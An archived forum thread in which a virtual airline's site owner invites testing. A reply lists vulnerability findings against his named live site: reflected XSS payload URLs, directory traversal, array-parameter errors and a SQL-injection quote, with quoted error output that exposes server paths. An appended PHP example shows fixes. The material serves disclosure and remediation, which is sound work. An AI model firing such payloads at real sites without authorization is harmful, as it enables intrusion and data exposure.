
Vista Security!


Crew-Portal


Why did I call this post vista security? Check my website and find out! Can someone use SQL injection and try to register themselves using SQL injection? But please don't register the other way; I really don't want anyone signed up unless they are working for this airline! Thanks in advance and ya... have fun. Also, if you do use SQL, please don't drop any of my databases! Please!  :'(


Array:

http://www.cmxva.com/index.php?page=flights&p[]

 

Array:

http://www.cmxva.com/index.php?page[]

 

Array:

http://www.cmxva.com/index.php?page=profile&call[]

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=<marquee>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=flights&p="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cmxva.com/index.php?page=profile&call=<marquee><h1>vulnerable</marquee>

 

Directory Traversal:

http://www.cmxva.com/?page=../index

 

Full Path Disclosure:

http://www.cmxva.com/?page=../../

  Quote
Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(pages/../../.php) is not within the allowed path(s): (/home/cmxvaco/:/usr/lib/php:/usr/local/lib/php:/tmp) in /home/cmxvaco/public_html/index.php on line 149

 

Full Path Disclosure:

http://www.cmxva.com/?page=../forums/index

  Quote
Warning: include(./extension.inc) [function.include]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/forums/index.php on line 25

 

Warning: include() [function.include]: Failed opening './extension.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/forums/index.php on line 25

 

Warning: include(./common.) [function.include]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/forums/index.php on line 26

 

Warning: include() [function.include]: Failed opening './common.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/forums/index.php on line 26

 

Fatal error: Call to undefined function session_pagestart() in /home/cmxvaco/public_html/forums/index.php on line 31

 

Full Path Disclosure:

http://www.cmxva.com/index.php?page=flights&s[]

  Quote
Warning: Illegal offset type in /home/cmxvaco/public_html/pages/flights.php on line 86

 

Full Path Disclosure:

http://www.cmxva.com/?page=FsPgetflight

  Quote
Warning: require(FsPadmin/setting.php) [function.require]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Fatal error: require() [function.require]: Failed opening required 'FsPadmin/setting.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Full Path Disclosure:

http://www.cmxva.com/pages/account.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/account.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/account.php on line 2

 

Warning: Cannot modify header information - headers already sent by (output started at /home/cmxvaco/public_html/pages/account.php:2) in /home/cmxvaco/public_html/pages/account.php on line 7

 

Full Path Disclosure:

http://www.cmxva.com/pages/aircraft.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/aircraft.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/aircraft.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/fleet.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/fleet.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/fleet.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/FsPgetflight.php

  Quote
Warning: require(FsPadmin/setting.php) [function.require]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Fatal error: require() [function.require]: Failed opening required 'FsPadmin/setting.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/FsPgetflight.php on line 4

 

Full Path Disclosure:

http://www.cmxva.com/pages/lost.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/lost.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/lost.php on line 2

 

Warning: Cannot modify header information - headers already sent by (output started at /home/cmxvaco/public_html/pages/lost.php:2) in /home/cmxvaco/public_html/pages/lost.php on line 7

 

Full Path Disclosure:

http://www.cmxva.com/pages/loa.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/loa.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/loa.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/members.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/members.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/members.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/postflight.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/postflight.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/postflight.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/remove.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/remove.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/remove.php on line 2

 

Full Path Disclosure:

http://www.cmxva.com/pages/training.php

  Quote
Warning: include_once(pages/nolog.php) [function.include-once]: failed to open stream: No such file or directory in /home/cmxvaco/public_html/pages/training.php on line 2

 

Warning: include_once() [function.include]: Failed opening 'pages/nolog.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/cmxvaco/public_html/pages/training.php on line 2

 

Includes Directory:

http://www.cmxva.com/pages/

 

Maximum Length:

If you edit the input boxes when you register you can remove the maximum lengths.

 

SQL Error:

http://www.cmxva.com/index.php?page=profile&call='

  Quote
A fatal MySQL error occured.

Query: SELECT * FROM flights WHERE PilotName = 'CMX-\'' ORDER BY FlightDate LIMIT 0,50

Error: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


Archived

This topic is now archived and is closed to further replies.
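
The findings in the reply above (array parameters, reflected markup, `../` in `page`, warnings carrying full paths, and the quote in `call`) share a few server-side fixes, sketched here as an added example that is not code from the thread or from the site. The `PAGES` allowlist, the helper names and the in-memory SQLite table are assumptions, and PDO with `pdo_sqlite` stands in for the site's MySQL access.

```php
<?php
declare(strict_types=1);
ini_set('display_errors', '0');   // warnings go to the log, not the response body
ini_set('log_errors', '1');
// Hypothetical allowlist: the only names ?page= may select.
const PAGES = ['flights', 'profile', 'account'];

// Scalar string parameter or null; ?page[] arrives as an array and is rejected.
function str_param(array $query, string $name): ?string {
    $v = $query[$name] ?? null;
    return is_string($v) ? $v : null;
}

// Allowlisted page file, or null for "../index", markup, arrays, unknown names.
function resolve_page(array $query, string $baseDir): ?string {
    $page = str_param($query, 'page');
    return ($page !== null && in_array($page, PAGES, true)) ? "$baseDir/$page.php" : null;
}

// Escape a value for HTML text or a quoted attribute before echoing it.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Bound parameter: a quote in $call stays data and cannot change the SQL.
function flights_for(PDO $db, string $call): array {
    $st = $db->prepare('SELECT * FROM flights WHERE PilotName = ? ORDER BY FlightDate LIMIT 50');
    $st->execute(['CMX-' . $call]);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed requests, one per class of input listed in the reply above.
$requests = [
    ['page' => 'flights', 'p' => '1'],
    ['page' => ['']],
    ['page' => '../index'],
    ['page' => '<marquee>vulnerable</marquee>'],
    ['page' => 'profile', 'call' => "'"],
];
foreach ($requests as $q) {
    $file = resolve_page($q, 'pages');
    echo $file ?? '404, rejected page=' . h((string) json_encode($q['page'])), "\n";
}
// Constructed in-memory table (assumes the pdo_sqlite extension is loaded).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE flights (PilotName TEXT, FlightDate TEXT)');
$db->exec("INSERT INTO flights VALUES ('CMX-100', '2007-09-01')");
echo count(flights_for($db, "'")), ' row(s) for a lone quote, ', count(flights_for($db, '100')), " for 100\n";
```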
